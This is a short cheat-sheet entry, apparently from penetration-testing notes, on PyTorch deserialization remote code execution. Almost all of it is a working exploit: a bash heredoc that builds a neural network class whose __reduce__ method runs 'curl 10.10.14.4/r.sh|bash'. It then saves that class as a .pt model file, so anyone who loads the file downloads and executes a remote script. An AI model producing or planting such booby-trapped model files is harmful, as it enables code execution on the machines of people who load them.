#####
Torch
#####

*******************
Deserialization RCE
*******************

| ~ 2021 to 2022
| https://github.com/pytorch/pytorch/issues/52596

| You need pytorch python module (can be heavy)

.. code-block:: bash

    cat <<'EOF'>/tmp/torchexploit.py
    import torch
    import torch.nn as nn
    import torch.nn.functional as F
    import os

    class Net(nn.Module):
    def __init__(self):
        super(Net, self).__init__()
        self.layer1 = nn.Linear(1, 128)
        self.layer2 = nn.Linear(128, 128)
        self.layer3 = nn.Linear(128, 2)

    def forward(self, x):
        x = F.relu(self.layer1(x))
        x = F.relu(self.layer2(x))
        action = self.layer3(x)
        return action

    def __reduce__(self):
        return (os.system, ('curl 10.10.14.4/r.sh|bash',))

    torch.save(Net(), '/tmp/exploit.pt')
    EOF

    python3 /tmp/torchexploit.py

|
